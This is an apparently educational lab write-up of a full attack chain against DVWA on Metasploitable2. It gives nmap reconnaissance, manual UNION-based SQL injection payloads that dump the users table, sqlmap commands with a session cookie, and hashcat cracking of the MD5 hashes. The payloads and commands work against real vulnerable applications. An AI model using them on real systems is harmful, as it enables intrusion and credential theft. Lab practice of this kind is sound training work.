==================================================
DVWA SQL Injection → Database Extraction (Manual + SQLmap)
==================================================

Target:
Metasploitable2 (DVWA)
IP: 192.168.56.101

Attacker:
Kali Linux
IP: 192.168.56.1


==================================================
Reconnaissance
==================================================

1. Host Discovery

Command:
nmap -sn 192.168.56.0/24

Result:
192.168.56.101 is alive


--------------------------------------------------

2. Service Enumeration

Command:
nmap -p 80 -sV 192.168.56.101

Result:
80/tcp open  http  Apache httpd 2.2.8 ((Ubuntu))


--------------------------------------------------

3. Web Application Identification

URL:
http://192.168.56.101/dvwa

Result:
Damn Vulnerable Web Application (DVWA) detected


--------------------------------------------------

4. Authentication

Credentials:
admin : password

Result:
Successfully authenticated to DVWA dashboard


--------------------------------------------------

5. Security Level Configuration

Action:
Set DVWA Security → LOW

Result:
Application configured to be vulnerable to injection attacks


==================================================
Exploitation (Manual SQL Injection)
==================================================

1. SQL Injection Entry Point

Location:
DVWA → SQL Injection

URL:
http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit

Result:
User ID parameter is vulnerable to SQL injection


--------------------------------------------------

2. Authentication Bypass

Payload:

1' OR '1'='1

Result:

- SQL query logic bypassed
- All records returned from database


--------------------------------------------------

3. Column Enumeration

Payloads:

1' ORDER BY 1-- -
1' ORDER BY 2-- -
1' ORDER BY 3-- -

Result:

- Identified correct number of columns
- Determined structure for UNION injection


--------------------------------------------------

4. Database Enumeration

Payload:

1' UNION SELECT null, database()-- -

Result:

dvwa


--------------------------------------------------

5. Table Enumeration

Payload:

1' UNION SELECT null, table_name FROM information_schema.tables-- -

Result:

- Identified available tables
- "users" table discovered


--------------------------------------------------

6. Column Enumeration

Payload:

1' UNION SELECT null, column_name FROM information_schema.columns WHERE table_name='users'-- -

Result:

- Identified columns:
    user
    password


--------------------------------------------------

7. Data Extraction

Payload:

1' UNION SELECT user, password FROM users-- -

Result:

- Extracted usernames and password hashes

Example:

admin : 5f4dcc3b5aa765d61d8327deb882cf99


==================================================
Exploitation (SQLmap Automation)
==================================================

1. Session Handling

Action:

- Login to DVWA via browser
- Extract session cookie

Example:

PHPSESSID=abc123xyz; security=low


--------------------------------------------------

2. Database Enumeration

Command:

sqlmap -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" \
--cookie="PHPSESSID=abc123xyz; security=low" \
--level=5 --risk=3 --batch --dbs

Result:

available databases:
dvwa
information_schema
mysql


--------------------------------------------------

3. Table Enumeration

Command:

sqlmap -u "URL" \
--cookie="SESSION" \
-D dvwa --tables

Result:

users
guestbook


--------------------------------------------------

4. Data Extraction

Command:

sqlmap -u "URL" \
--cookie="SESSION" \
-D dvwa -T users --dump

Result:

- Extracted full users table
- Credentials automatically retrieved


==================================================
Post-Exploitation
==================================================

1. Hash Analysis

Hash type:
MD5

Example:

5f4dcc3b5aa765d61d8327deb882cf99

Result:

- Weak hashing algorithm identified
- Suitable for offline cracking


--------------------------------------------------

2. Password Cracking

Preparation:

Create file:
hashes.txt

Format:

5f4dcc3b5aa765d61d8327deb882cf99


Command:

hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt


Result:

password


--------------------------------------------------

3. Credential Reuse

Result:

- Valid credentials recovered
- Potential reuse across services or applications


==================================================
Summary
==================================================

- DVWA application contained SQL injection vulnerability
- Manual injection allowed full database enumeration
- SQLmap automated the entire exploitation process
- User credentials were extracted from backend database
- Password hashes were cracked offline
- Plaintext credentials successfully recovered

This demonstrates a full attack chain:

Reconnaissance → Injection → Enumeration → Automation → Data Extraction → Password Cracking


==================================================
Key Learning Points
==================================================

- SQL injection enables direct database interaction
- UNION-based attacks allow structured data extraction
- information_schema reveals database structure
- SQLmap automates complex injection techniques
- Weak hashing (MD5) is easily cracked
- Session handling is critical for authenticated attacks
- Input validation and prepared statements are essential defenses